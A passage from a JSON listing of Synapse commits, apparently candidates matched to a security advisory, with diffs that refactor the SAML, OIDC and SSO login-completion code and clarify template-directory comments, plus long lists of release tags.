a/synapse/handlers/oidc_handler.py", - "+++ b/synapse/handlers/oidc_handler.py", - "@@ -676,2 +676,17 @@ class OidcHandler(BaseHandler):", - "+ # first check if we're doing a UIA", - "+ if ui_auth_session_id:", - "+ try:", - "+ remote_user_id = self._remote_id_from_userinfo(userinfo)", - "+ except Exception as e:", - "+ logger.exception(\"Could not extract remote user id\")", - "+ self._sso_handler.render_error(request, \"mapping_error\", str(e))", - "+ return", - "+", - "+ return await self._sso_handler.complete_sso_ui_auth_request(", - "+ self._auth_provider_id, remote_user_id, ui_auth_session_id, request", - "+ )", - "+", - "+ # otherwise, it's a login", - "+", - " # Pull out the user-agent and IP from the request.", - "@@ -700,10 +715,5 @@ class OidcHandler(BaseHandler):", - " # and finally complete the login", - "- if ui_auth_session_id:", - "- await self._auth_handler.complete_sso_ui_auth(", - "- user_id, ui_auth_session_id, request", - "- )", - "- else:", - "- await self._auth_handler.complete_sso_login(", - "- user_id, request, client_redirect_url, extra_attributes", - "- )", - "+ await self._auth_handler.complete_sso_login(", - "+ user_id, request, client_redirect_url, extra_attributes", - "+ )", - "@@ -858,3 +868,3 @@ class OidcHandler(BaseHandler):", - " try:", - "- remote_user_id = self._user_mapping_provider.get_remote_user_id(userinfo)", - "+ remote_user_id = self._remote_id_from_userinfo(userinfo)", - " except Exception as e:", - "@@ -863,5 +873,2 @@ class OidcHandler(BaseHandler):", - " )", - "- # Some OIDC providers use integer IDs, but Synapse expects external IDs", - "- # to be strings.", - "- remote_user_id = str(remote_user_id)", - "@@ -935,2 +942,15 @@ class OidcHandler(BaseHandler):", - "+ def _remote_id_from_userinfo(self, userinfo: UserInfo) -> str:", - "+ \"\"\"Extract the unique remote id from an OIDC UserInfo block", - "+", - "+ Args:", - "+ userinfo: An object representing the user given by the OIDC provider", - "+ Returns:", - "+ remote user id", - "+ \"\"\"", - "+ remote_user_id = self._user_mapping_provider.get_remote_user_id(userinfo)", - "+ # Some OIDC providers use integer IDs, but Synapse expects external IDs", - "+ # to be strings.", - "+ return str(remote_user_id)", - "+", - "diff --git a/synapse/handlers/saml_handler.py b/synapse/handlers/saml_handler.py", - "index 76d4169fe..5846f0860 100644", - "--- a/synapse/handlers/saml_handler.py", - "+++ b/synapse/handlers/saml_handler.py", - "@@ -185,2 +185,20 @@ class SamlHandler(BaseHandler):", - "+ # first check if we're doing a UIA", - "+ if current_session and current_session.ui_auth_session_id:", - "+ try:", - "+ remote_user_id = self._remote_id_from_saml_response(saml2_auth, None)", - "+ except MappingException as e:", - "+ logger.exception(\"Failed to extract remote user id from SAML response\")", - "+ self._sso_handler.render_error(request, \"mapping_error\", str(e))", - "+ return", - "+", - "+ return await self._sso_handler.complete_sso_ui_auth_request(", - "+ self._auth_provider_id,", - "+ remote_user_id,", - "+ current_session.ui_auth_session_id,", - "+ request,", - "+ )", - "+", - "+ # otherwise, we're handling a login request.", - "+", - " # Ensure that the attributes of the logged in user meet the required", - "@@ -208,10 +226,3 @@ class SamlHandler(BaseHandler):", - "- # Complete the interactive auth session or the login.", - "- if current_session and current_session.ui_auth_session_id:", - "- await self._auth_handler.complete_sso_ui_auth(", - "- user_id, current_session.ui_auth_session_id, request", - "- )", - "-", - "- else:", - "- await self._auth_handler.complete_sso_login(user_id, request, relay_state)", - "+ await self._auth_handler.complete_sso_login(user_id, request, relay_state)", - "@@ -241,4 +252,3 @@ class SamlHandler(BaseHandler):", - " \"\"\"", - "-", - "- remote_user_id = self._user_mapping_provider.get_remote_user_id(", - "+ remote_user_id = self._remote_id_from_saml_response(", - " saml2_auth, client_redirect_url", - "@@ -246,7 +256,2 @@ class SamlHandler(BaseHandler):", - "- if not remote_user_id:", - "- raise MappingException(", - "- \"Failed to extract remote user id from SAML response\"", - "- )", - "-", - " async def saml_response_to_remapped_user_attributes(", - "@@ -306,2 +311,31 @@ class SamlHandler(BaseHandler):", - "+ def _remote_id_from_saml_response(", - "+ self,", - "+ saml2_auth: saml2.response.AuthnResponse,", - "+ client_redirect_url: Optional[str],", - "+ ) -> str:", - "+ \"\"\"Extract the unique remote id from a SAML2 AuthnResponse", - "+", - "+ Args:", - "+ saml2_auth: The parsed SAML2 response.", - "+ client_redirect_url: The redirect URL passed in by the client.", - "+ Returns:", - "+ remote user id", - "+", - "+ Raises:", - "+ MappingException if there was an error extracting the user id", - "+ \"\"\"", - "+ # It's not obvious why we need to pass in the redirect URI to the mapping", - "+ # provider, but we do :/", - "+ remote_user_id = self._user_mapping_provider.get_remote_user_id(", - "+ saml2_auth, client_redirect_url", - "+ )", - "+", - "+ if not remote_user_id:", - "+ raise MappingException(", - "+ \"Failed to extract remote user id from SAML response\"", - "+ )", - "+", - "+ return remote_user_id", - "+", - " def expire_sessions(self):", - "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", - "index 47ad96f97..e24767b92 100644", - "--- a/synapse/handlers/sso.py", - "+++ b/synapse/handlers/sso.py", - "@@ -19,4 +19,5 @@ import attr", - "+from twisted.web.http import Request", - "+", - " from synapse.api.errors import RedirectException", - "-from synapse.handlers._base import BaseHandler", - " from synapse.http.server import respond_with_html", - "@@ -44,3 +45,3 @@ class UserAttributes:", - "-class SsoHandler(BaseHandler):", - "+class SsoHandler:", - " # The number of attempts to ask the mapping provider for when generating an MXID.", - "@@ -49,5 +50,7 @@ class SsoHandler(BaseHandler):", - " def __init__(self, hs: \"HomeServer\"):", - "- super().__init__(hs)", - "+ self._store = hs.get_datastore()", - "+ self._server_name = hs.hostname", - " self._registration_handler = hs.get_registration_handler()", - " self._error_template = hs.config.sso_error_template", - "+ self._auth_handler = hs.get_auth_handler()", - "@@ -97,3 +100,3 @@ class SsoHandler(BaseHandler):", - " # Check if we already have a mapping for this user.", - "- previously_registered_user_id = await self.store.get_user_by_external_id(", - "+ previously_registered_user_id = await self._store.get_user_by_external_id(", - " auth_provider_id, remote_user_id,", - "@@ -183,3 +186,3 @@ class SsoHandler(BaseHandler):", - " # Future logins should also match this user ID.", - "- await self.store.record_user_external_id(", - "+ await self._store.record_user_external_id(", - " auth_provider_id, remote_user_id, previously_registered_user_id", - "@@ -216,4 +219,4 @@ class SsoHandler(BaseHandler):", - " # Check if this mxid already exists", - "- user_id = UserID(attributes.localpart, self.server_name).to_string()", - "- if not await self.store.get_users_by_id_case_insensitive(user_id):", - "+ user_id = UserID(attributes.localpart, self._server_name).to_string()", - "+ if not await self._store.get_users_by_id_case_insensitive(user_id):", - " # This mxid is free", - "@@ -240,3 +243,3 @@ class SsoHandler(BaseHandler):", - "- await self.store.record_user_external_id(", - "+ await self._store.record_user_external_id(", - " auth_provider_id, remote_user_id, registered_user_id", - "@@ -244 +247,41 @@ class SsoHandler(BaseHandler):", - " return registered_user_id", - "+", - "+ async def complete_sso_ui_auth_request(", - "+ self,", - "+ auth_provider_id: str,", - "+ remote_user_id: str,", - "+ ui_auth_session_id: str,", - "+ request: Request,", - "+ ) -> None:", - "+ \"\"\"", - "+ Given an SSO ID, retrieve the user ID for it and complete UIA.", - "+", - "+ Note that this requires that the user is mapped in the \"user_external_ids\"", - "+ table. This will be the case if they have ever logged in via SAML or OIDC in", - "+ recentish synapse versions, but may not be for older users.", - "+", - "+ Args:", - "+ auth_provider_id: A unique identifier for this SSO provider, e.g.", - "+ \"oidc\" or \"saml\".", - "+ remote_user_id: The unique identifier from the SSO provider.", - "+ ui_auth_session_id: The ID of the user-interactive auth session.", - "+ request: The request to complete.", - "+ \"\"\"", - "+", - "+ user_id = await self.get_sso_user_by_remote_user_id(", - "+ auth_provider_id, remote_user_id,", - "+ )", - "+", - "+ if not user_id:", - "+ logger.warning(", - "+ \"Remote user %s/%s has not previously logged in here: UIA will fail\",", - "+ auth_provider_id,", - "+ remote_user_id,", - "+ )", - "+ # Let the UIA flow handle this the same as if they presented creds for a", - "+ # different user.", - "+ user_id = \"\"", - "+", - "+ await self._auth_handler.complete_sso_ui_auth(", - "+ user_id, ui_auth_session_id, request", - "+ )" - ], - "changed_files": [ - "changelog.d/8881.misc", - "mypy.ini", - "synapse/handlers/_base.py", - "synapse/handlers/auth.py", - "synapse/handlers/oidc_handler.py", - "synapse/handlers/saml_handler.py", - "synapse/handlers/sso.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8881": "Use the abstract registration code for CAS #8856" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8881, 8881", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8881", - "relevance": 2 - } - ] - }, - { - "commit_id": "025fa06fc743bda7c4769b19991c40a1fb5d12ba", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607436188, - "hunks": 5, - "message": "Clarify config template comments (#8891)", - "diff": [ - "diff --git a/changelog.d/8891.doc b/changelog.d/8891.doc", - "new file mode 100644", - "index 000000000..c3947fe7c", - "--- /dev/null", - "+++ b/changelog.d/8891.doc", - "@@ -0,0 +1 @@", - "+Clarify comments around template directories in `sample_config.yaml`.", - "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", - "index 8712c580c..68c8f4f0e 100644", - "--- a/docs/sample_config.yaml", - "+++ b/docs/sample_config.yaml", - "@@ -1881,7 +1881,4 @@ sso:", - " # Directory in which Synapse will try to find the template files below.", - "- # If not set, default templates from within the Synapse package will be used.", - "- #", - "- # DO NOT UNCOMMENT THIS SETTING unless you want to customise the templates.", - "- # If you *do* uncomment it, you will need to make sure that all the templates", - "- # below are in the directory.", - "+ # If not set, or the files named below are not found within the template", - "+ # directory, default templates from within the Synapse package will be used.", - " #", - "@@ -2115,5 +2112,4 @@ email:", - " # Directory in which Synapse will try to find the template files below.", - "- # If not set, default templates from within the Synapse package will be used.", - "- #", - "- # Do not uncomment this setting unless you want to customise the templates.", - "+ # If not set, or the files named below are not found within the template", - "+ # directory, default templates from within the Synapse package will be used.", - " #", - "diff --git a/synapse/config/emailconfig.py b/synapse/config/emailconfig.py", - "index cceffbfee..7c8b64d84 100644", - "--- a/synapse/config/emailconfig.py", - "+++ b/synapse/config/emailconfig.py", - "@@ -392,5 +392,4 @@ class EmailConfig(Config):", - " # Directory in which Synapse will try to find the template files below.", - "- # If not set, default templates from within the Synapse package will be used.", - "- #", - "- # Do not uncomment this setting unless you want to customise the templates.", - "+ # If not set, or the files named below are not found within the template", - "+ # directory, default templates from within the Synapse package will be used.", - " #", - "diff --git a/synapse/config/sso.py b/synapse/config/sso.py", - "index 442767616..93bbd4093 100644", - "--- a/synapse/config/sso.py", - "+++ b/synapse/config/sso.py", - "@@ -95,7 +95,4 @@ class SSOConfig(Config):", - " # Directory in which Synapse will try to find the template files below.", - "- # If not set, default templates from within the Synapse package will be used.", - "- #", - "- # DO NOT UNCOMMENT THIS SETTING unless you want to customise the templates.", - "- # If you *do* uncomment it, you will need to make sure that all the templates", - "- # below are in the directory.", - "+ # If not set, or the files named below are not found within the template", - "+ # directory, default templates from within the Synapse package will be used.", - " #" - ], - "changed_files": [ - "changelog.d/8891.doc", - "docs/sample_config.yaml", - "synapse/config/emailconfig.py", - "synapse/config/sso.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8891": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8891, 8891", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8891", - "relevance": 2 - } - ] - }, - { - "commit_id": "e1b8e37f936b115e2164d272333c9b15342e6f88", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608148913, - "hunks": 42, - "message": "Push login completion down into SsoHandler (#8941) This is another part of my work towards fixing #8876. It moves some of the logic currently in the SAML and OIDC handlers - in particular the call to `AuthHandler.complete_sso_login` down into the `SsoHandler`.", - "diff": [ - "diff --git a/changelog.d/8941.feature b/changelog.d/8941.feature", - "new file mode 100644", - "index 000000000..d450ef499", - "--- /dev/null", - "+++ b/changelog.d/8941.feature", - "@@ -0,0 +1 @@", - "+Add support for allowing users to pick their own user ID during a single-sign-on login.", - "diff --git a/synapse/handlers/oidc_handler.py b/synapse/handlers/oidc_handler.py", - "index f626117f7..cbd11a138 100644", - "--- a/synapse/handlers/oidc_handler.py", - "+++ b/synapse/handlers/oidc_handler.py", - "@@ -117,4 +117,2 @@ class OidcHandler(BaseHandler):", - " self._http_client = hs.get_proxied_http_client()", - "- self._auth_handler = hs.get_auth_handler()", - "- self._registration_handler = hs.get_registration_handler()", - " self._server_name = hs.config.server_name # type: str", - "@@ -691,10 +689,6 @@ class OidcHandler(BaseHandler):", - "- # Pull out the user-agent and IP from the request.", - "- user_agent = request.get_user_agent(\"\")", - "- ip_address = self.hs.get_ip_from_request(request)", - "-", - " # Call the mapper to register/login the user", - " try:", - "- user_id = await self._map_userinfo_to_user(", - "- userinfo, token, user_agent, ip_address", - "+ await self._complete_oidc_login(", - "+ userinfo, token, request, client_redirect_url", - " )", - "@@ -703,17 +697,2 @@ class OidcHandler(BaseHandler):", - " self._sso_handler.render_error(request, \"mapping_error\", str(e))", - "- return", - "-", - "- # Mapping providers might not have get_extra_attributes: only call this", - "- # method if it exists.", - "- extra_attributes = None", - "- get_extra_attributes = getattr(", - "- self._user_mapping_provider, \"get_extra_attributes\", None", - "- )", - "- if get_extra_attributes:", - "- extra_attributes = await get_extra_attributes(userinfo, token)", - "-", - "- # and finally complete the login", - "- await self._auth_handler.complete_sso_login(", - "- user_id, request, client_redirect_url, extra_attributes", - "- )", - "@@ -840,6 +819,10 @@ class OidcHandler(BaseHandler):", - "- async def _map_userinfo_to_user(", - "- self, userinfo: UserInfo, token: Token, user_agent: str, ip_address: str", - "- ) -> str:", - "- \"\"\"Maps a UserInfo object to a mxid.", - "+ async def _complete_oidc_login(", - "+ self,", - "+ userinfo: UserInfo,", - "+ token: Token,", - "+ request: SynapseRequest,", - "+ client_redirect_url: str,", - "+ ) -> None:", - "+ \"\"\"Given a UserInfo response, complete the login flow", - "@@ -855,2 +838,4 @@ class OidcHandler(BaseHandler):", - "+ Otherwise, render a redirect back to the client_redirect_url with a loginToken.", - "+", - " Args:", - "@@ -858,4 +843,4 @@ class OidcHandler(BaseHandler):", - " token: a dict with the tokens obtained from the provider", - "- user_agent: The user agent of the client making the request.", - "- ip_address: The IP address of the client making the request.", - "+ request: The request to respond to", - "+ client_redirect_url: The redirect URL passed in by the client.", - "@@ -863,5 +848,2 @@ class OidcHandler(BaseHandler):", - " MappingException: if there was an error while mapping some properties", - "-", - "- Returns:", - "- The mxid of the user", - " \"\"\"", - "@@ -933,9 +915,19 @@ class OidcHandler(BaseHandler):", - "- return await self._sso_handler.get_mxid_from_sso(", - "+ # Mapping providers might not have get_extra_attributes: only call this", - "+ # method if it exists.", - "+ extra_attributes = None", - "+ get_extra_attributes = getattr(", - "+ self._user_mapping_provider, \"get_extra_attributes\", None", - "+ )", - "+ if get_extra_attributes:", - "+ extra_attributes = await get_extra_attributes(userinfo, token)", - "+", - "+ await self._sso_handler.complete_sso_login_request(", - " self._auth_provider_id,", - " remote_user_id,", - "- user_agent,", - "- ip_address,", - "+ request,", - "+ client_redirect_url,", - " oidc_response_to_user_attributes,", - " grandfather_existing_users,", - "+ extra_attributes,", - " )", - "diff --git a/synapse/handlers/saml_handler.py b/synapse/handlers/saml_handler.py", - "index 6001fe3e2..5fa7ab3f8 100644", - "--- a/synapse/handlers/saml_handler.py", - "+++ b/synapse/handlers/saml_handler.py", - "@@ -60,4 +60,2 @@ class SamlHandler(BaseHandler):", - " self._saml_idp_entityid = hs.config.saml2_idp_entityid", - "- self._auth_handler = hs.get_auth_handler()", - "- self._registration_handler = hs.get_registration_handler()", - "@@ -231,11 +229,5 @@ class SamlHandler(BaseHandler):", - "- # Pull out the user-agent and IP from the request.", - "- user_agent = request.get_user_agent(\"\")", - "- ip_address = self.hs.get_ip_from_request(request)", - "-", - " # Call the mapper to register/login the user", - " try:", - "- user_id = await self._map_saml_response_to_user(", - "- saml2_auth, relay_state, user_agent, ip_address", - "- )", - "+ await self._complete_saml_login(saml2_auth, request, relay_state)", - " except MappingException as e:", - "@@ -243,15 +235,14 @@ class SamlHandler(BaseHandler):", - " self._sso_handler.render_error(request, \"mapping_error\", str(e))", - "- return", - "- await self._auth_handler.complete_sso_login(user_id, request, relay_state)", - "-", - "- async def _map_saml_response_to_user(", - "+ async def _complete_saml_login(", - " self,", - " saml2_auth: saml2.response.AuthnResponse,", - "+ request: SynapseRequest,", - " client_redirect_url: str,", - "- user_agent: str,", - "- ip_address: str,", - "- ) -> str:", - "+ ) -> None:", - " \"\"\"", - "- Given a SAML response, retrieve the user ID for it and possibly register the user.", - "+ Given a SAML response, complete the login flow", - "+", - "+ Retrieves the remote user ID, registers the user if necessary, and serves", - "+ a redirect back to the client with a login-token.", - "@@ -259,8 +250,4 @@ class SamlHandler(BaseHandler):", - " saml2_auth: The parsed SAML2 response.", - "+ request: The request to respond to", - " client_redirect_url: The redirect URL passed in by the client.", - "- user_agent: The user agent of the client making the request.", - "- ip_address: The IP address of the client making the request.", - "-", - "- Returns:", - "- The user ID associated with this response.", - "@@ -320,7 +307,7 @@ class SamlHandler(BaseHandler):", - "- return await self._sso_handler.get_mxid_from_sso(", - "+ await self._sso_handler.complete_sso_login_request(", - " self._auth_provider_id,", - " remote_user_id,", - "- user_agent,", - "- ip_address,", - "+ request,", - "+ client_redirect_url,", - " saml_response_to_remapped_user_attributes,", - "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", - "index 112a7d5b2..f054b66a5 100644", - "--- a/synapse/handlers/sso.py", - "+++ b/synapse/handlers/sso.py", - "@@ -23,3 +23,4 @@ from synapse.api.errors import RedirectException", - " from synapse.http.server import respond_with_html", - "-from synapse.types import UserID, contains_invalid_mxid_characters", - "+from synapse.http.site import SynapseRequest", - "+from synapse.types import JsonDict, UserID, contains_invalid_mxid_characters", - " from synapse.util.async_helpers import Linearizer", - "@@ -121,3 +122,3 @@ class SsoHandler:", - "- async def get_mxid_from_sso(", - "+ async def complete_sso_login_request(", - " self,", - "@@ -125,7 +126,8 @@ class SsoHandler:", - " remote_user_id: str,", - "- user_agent: str,", - "- ip_address: str,", - "+ request: SynapseRequest,", - "+ client_redirect_url: str,", - " sso_to_matrix_id_mapper: Callable[[int], Awaitable[UserAttributes]],", - " grandfather_existing_users: Optional[Callable[[], Awaitable[Optional[str]]]],", - "- ) -> str:", - "+ extra_login_attributes: Optional[JsonDict] = None,", - "+ ) -> None:", - " \"\"\"", - "@@ -148,2 +150,4 @@ class SsoHandler:", - "+ Finally, we generate a redirect to the supplied redirect uri, with a login token", - "+", - " Args:", - "@@ -151,5 +155,9 @@ class SsoHandler:", - " \"oidc\" or \"saml\".", - "+", - " remote_user_id: The unique identifier from the SSO provider.", - "- user_agent: The user agent of the client making the request.", - "- ip_address: The IP address of the client making the request.", - "+", - "+ request: The request to respond to", - "+", - "+ client_redirect_url: The redirect URL passed in by the client.", - "+", - " sso_to_matrix_id_mapper: A callable to generate the user attributes.", - "@@ -165,2 +173,3 @@ class SsoHandler:", - " to prompt the user for more information).", - "+", - " grandfather_existing_users: A callable which can return an previously", - "@@ -169,4 +178,4 @@ class SsoHandler:", - "- Returns:", - "- The user ID associated with the SSO response.", - "+ extra_login_attributes: An optional dictionary of extra", - "+ attributes to be provided to the client in the login response.", - "@@ -183,24 +192,29 @@ class SsoHandler:", - " # first of all, check if we already have a mapping for this user", - "- previously_registered_user_id = await self.get_sso_user_by_remote_user_id(", - "+ user_id = await self.get_sso_user_by_remote_user_id(", - " auth_provider_id, remote_user_id,", - " )", - "- if previously_registered_user_id:", - "- return previously_registered_user_id", - " # Check for grandfathering of users.", - "- if grandfather_existing_users:", - "- previously_registered_user_id = await grandfather_existing_users()", - "- if previously_registered_user_id:", - "+ if not user_id and grandfather_existing_users:", - "+ user_id = 